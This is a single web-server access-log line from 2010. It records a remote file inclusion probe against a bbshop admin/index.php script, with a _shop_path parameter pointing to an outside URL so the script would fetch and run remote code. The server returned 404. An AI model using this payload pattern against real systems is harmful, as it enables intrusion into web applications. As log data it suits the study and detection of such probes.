112.216.153.186 - - [20/May/2010:21:22:15 -0500] "GET /logs/access_log.1265673600///bbshop451//admin/index.php?_shop_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
